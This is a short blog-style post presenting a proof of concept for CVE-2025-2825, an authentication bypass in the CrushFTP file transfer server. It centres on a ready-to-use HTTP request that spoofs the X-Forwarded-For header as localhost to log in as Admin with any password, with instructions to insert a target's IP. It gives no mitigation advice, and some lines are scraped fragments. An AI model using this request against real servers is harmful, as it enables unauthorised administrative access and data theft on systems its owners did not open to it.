Authentication Bypass PoC for CVE-2025-2825 – Exploiting CrushFTP 10.x
CVE-2025-2825 is a critical authentication bypass vulnerability affecting CrushFTP, a widely used secure file transfer server. The flaw allows remote attackers to bypass login authentication and gain administrative access by spoofing headers — tricking the server into thinking the request came from localhost.
The vulnerability arises due to improper validation of the X-Forwarded-For header. When this header is set to 127.0.0.1, the server treats the request as local — bypassing authentication.
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1
Host: target-ip
X-Forwarded-For: 127.0.0.1
📝 Replace
target-ipwith the actual IP address of the target CrushFTP server.
If successful, the server bypasses authentication and grants access — even with incorrect credentials.
X-Forwarded-For: 127.0.0.1
X-Forwarded-For.Shivshant Patil
Certified Ethical Hacker (CEH v13)
B.Tech Computer Engineering Graduate
🔗 LinkedIn Profile
🔗 Github Profile